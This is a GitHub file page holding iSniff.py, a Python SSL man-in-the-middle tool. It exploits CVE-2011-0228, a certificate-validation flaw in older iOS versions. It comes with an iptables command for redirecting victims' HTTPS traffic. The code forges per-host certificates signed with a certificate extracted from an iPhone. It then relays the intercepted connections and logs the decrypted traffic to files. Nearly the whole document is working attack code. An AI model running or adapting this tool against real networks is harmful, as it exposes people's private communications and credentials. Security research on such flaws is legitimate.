-
Notifications
You must be signed in to change notification settings - Fork 8
/
iSniff.py
executable file
·202 lines (188 loc) · 8.87 KB
/
iSniff.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
#! /usr/bin/env python
# iSniff.py [updated release 2011-08-25]
#
# SSL man-in-the-middle tool inspired by Moxie Marlinspike's sslsniff 0.8
#
# Successfully tested against iOS < 4.3.5 devices vulnerable to CVE-2011-0228
# basic constraints validation issue (see http://support.apple.com/kb/HT4824)
# discovered by Gregor Kopf / Paul Kehrer
#
# Written by hubert(a)pentest.com / @hubert3
#
# Redirect SSL traffic from NAT'd clients to iSniff as follows:
#
# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 2000
#
# Linux/iptables is currently required for iSniff to determine the intended destination
# of redirected traffic and generate working certs. Other platforms are not supported.
#
# Any certificate trusted by iOS can be used as signing_cert - The example config below
# uses an APNS cert extracted from an iPhone using 'nimble' (tool and cert not included).
# The certificate chain constructed with this config is similar to the one presented at
# https://issl.recurity.com. Website certs issued by other trusted CAs such as Verisign,
# Startcom, Comodo etc. also work.
#
# Tested on Debian GNU/Linux 6.0 (kernel 2.6.32-5-686, Python 2.6.6)
# Packages required: python-m2crypto
import M2Crypto, ssl, SocketServer, socket, struct, random, os.path, sys, time
from SSL_Certificate_CN2 import getCertHostnames
from threading import Thread
from color import *
signing_cert = 'iphone_device.pem'
signing_cert_key = 'iphone_device.key'
# first ca cert specified below must be the issuer of signing_cert (often an intermediate CA cert)
cacerts = ['cacerts/apple_iphone_device_ca.pem','cacerts/apple_iphone_ca.pem','cacerts/apple_root.pem']
add_extra_hostnames = False #add extra subjectAltNames to fake certs generated, e.g. 'google.com' if CN=www.google.com
bind_host = '0.0.0.0'
bind_port = 2000
RemoteHostnames = {} #key=remote IP address, value=list of hostnames (CN/subjectAltNames) in remote cert
GeneratedCert = {} #key=remote IP address, value=tuple of filenames (cert & key) generated by iSniff
CertQueue = set()
NameLookupQueue = set()
cacerts.insert(0,signing_cert)
certchain = ''
for ca in cacerts:
certchain += file(ca).read() #build a long string of concatenated PEM files representing the complete chain
def getCertHostnamesCached (ip):
if ip in NameLookupQueue: #if another thread is already looking up the CN for this IP...
while ip not in RemoteHostnames:
time.sleep(0.1)
return RemoteHostnames[ip]
else:
NameLookupQueue.update([ip])
hostnames = getCertHostnames(ip)
print warning('Server %s hostnames: %s' % (ip, hostnames))
return hostnames
def CreateSignedX509Certificate (ip, hostnames, peername):
if ip in CertQueue: #if another thread is already generating a cert for this IP...
while ip not in GeneratedCert:
time.sleep(0.1)
return True
else:
CertQueue.update([ip])
print warning('Generating cert for IP %s [%s + %s]' % (ip, hostnames[0], len(hostnames)-1))
def callback():
return 'p'
certfile = 'certs/CN_%s_IP_%s.pem' % (hostnames[0], ip) #filename of cert we're going to generate
keyfile = certfile[:-3]+'key' #filename of associated private key
MBSTRING_FLAG = 0x1000
MBSTRING_ASC = MBSTRING_FLAG | 1
x509req = M2Crypto.X509.Request()
x509name = M2Crypto.X509.X509_Name()
x509name.add_entry_by_txt(field='C', type=MBSTRING_ASC, entry='AU', len=-1, loc=-1, set=0)
x509name.add_entry_by_txt(field='CN', type=MBSTRING_ASC, entry=hostnames[0], len=-1, loc=-1, set=0)
x509req.set_subject_name(x509name)
KeyPair = M2Crypto.RSA.gen_key(1024, MBSTRING_ASC, callback)
PKey = M2Crypto.EVP.PKey(md='sha1')
PKey.assign_rsa(KeyPair)
x509req.set_pubkey(pkey=PKey)
#x509req.sign(pkey=PKey, md='sha1')
PKey.save_key(file=keyfile, cipher=None) #CSR done, save private key
signingCert = M2Crypto.X509.load_cert(signing_cert)
newCert = M2Crypto.X509.X509()
newCert.set_issuer(signingCert.get_subject())
newCert.set_subject(x509req.get_subject())
newCert.set_pubkey(x509req.get_pubkey())
newCert.set_version(1) # this is 3 in moxie's sslsniff 0.8, which my iOS devices always reject
newCert.set_serial_number(random.randint(1,9999999))
ASN1 = M2Crypto.ASN1.ASN1_UTCTIME()
ASN1.set_time(int(time.time()-365*24*60*60))
newCert.set_not_before(ASN1)
ASN1.set_time(int(time.time()+365*24*60*60))
newCert.set_not_after(ASN1)
if len(hostnames)>1:
SAN_string = ''
for hostname in hostnames[1:]:
SAN_string += 'DNS:%s, ' % hostname
newCert.add_ext(M2Crypto.X509.new_extension('subjectAltName', SAN_string.strip(', ')))
signingKey = M2Crypto.EVP.load_key(signing_cert_key)
newCert.sign(pkey=signingKey, md='sha1')
file(certfile,'w').write(newCert.as_pem()+certchain)
GeneratedCert[ip] = (certfile, keyfile)
print stealthy('Saved as %s' % certfile)
class PipeThread( Thread ):
pipes = [] #taken from http://code.activestate.com/recipes/114642
def __init__( self, source, sink, logfile=False):
Thread.__init__( self )
self.source = source
self.sink = sink
self.logfile = logfile
PipeThread.pipes.append( self )
def run( self ):
while 1:
try:
data = self.source.recv( 1024 )
if not data: break
if self.logfile:
self.logfile.write(data)
self.logfile.flush()
self.sink.send( data )
except:
break
PipeThread.pipes.remove( self )
class SingleTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
SO_ORIGINAL_DST = 80
# self.request is the client connection/socket
dst = self.request.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16) # Get the original destination IP before iptables redirect
_, dst_port, ip1, ip2, ip3, ip4 = struct.unpack("!HHBBBB8x", dst)
dst_ip = '%s.%s.%s.%s' % (ip1,ip2,ip3,ip4)
peername = '%s:%s' % (self.request.getpeername()[0], self.request.getpeername()[1])
print success('Client %s -> %s:443' % (peername, dst_ip))
RemoteHostnames[dst_ip] = getCertHostnamesCached(dst_ip)
#RemoteHostnames[dst_ip] = ['*.*.*.*','*.*.*','*.*','*'] # example fixed wildcard cert
CN = RemoteHostnames[dst_ip][0] # SSL_Certificate_CN2 module will return CN as first list element
if add_extra_hostnames:
import tldextract
domain = tldextract.extract(CN).domain
tld = tldextract.extract(CN).tld
bonus_hostnames = [] # kludge to work around lack of good support for SNI (server name indication) in python
bonus_hostnames.append('www.%s.%s' % (domain,tld))
bonus_hostnames.append('*.%s.%s' % (domain,tld))
bonus_hostnames.append('%s.%s' % (domain,tld)) # without this, requests to (e.g.) https://google.com fail as the CN is
for extra_name in bonus_hostnames: # www.google.com and there is no subjectAltName 'google.com' in the cert.
if extra_name not in RemoteHostnames[dst_ip]:
# however, adding extra hostnames as subjectAltNames makes other certs fail to validate, so disabled by default
RemoteHostnames[dst_ip].append(extra_name)
PhoneConnected = False
CreateSignedX509Certificate(ip=dst_ip, hostnames=RemoteHostnames[dst_ip], peername=peername)
try:
(certfile, keyfile) = GeneratedCert[dst_ip]
#print 'Setting up SSL socket using %s' % certfile
stream_phone = ssl.wrap_socket(self.request, server_side=True, certfile=certfile,
keyfile=keyfile, ssl_version=ssl.PROTOCOL_TLSv1)
PhoneConnected = True
except (ssl.SSLError), e:
print error('SSLError on connection to phone (%s)' % e)
self.finish()
try:
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
stream_server = ssl.wrap_socket(server_sock)
stream_server.connect((dst_ip, 443))
if PhoneConnected:
if not any(pattern in CN for pattern in ['static','fbcdn','akamai','objects']): # don't bother logging requests to CDN / static content hosts
print great_success('Logging to logs/%s-%s.log' % (CN,peername))
PipeThread(stream_phone, stream_server, logfile=file('logs/%s-%s.log'% (CN,peername),'a')).start()
else:
PipeThread(stream_phone, stream_server).start()
PipeThread(stream_server, stream_phone).start()
except (ssl.SSLError), e:
print error('SSLError on connection to server (%s)' % e)
self.finish()
class SimpleServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Ctrl-C will cleanly kill all spawned threads
daemon_threads = True
# much faster rebinding
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass):
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
if __name__ == "__main__":
server = SimpleServer((bind_host, bind_port), SingleTCPHandler)
# terminate with Ctrl-C
try:
print info('iSniff.py listening on %s:%s' % (bind_host, bind_port))
print info('Forward traffic from iPhones / iPads running iOS < 4.3.5 using:')
print info('iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports %s\n' % bind_port)
server.serve_forever()
except KeyboardInterrupt:
sys.exit(0)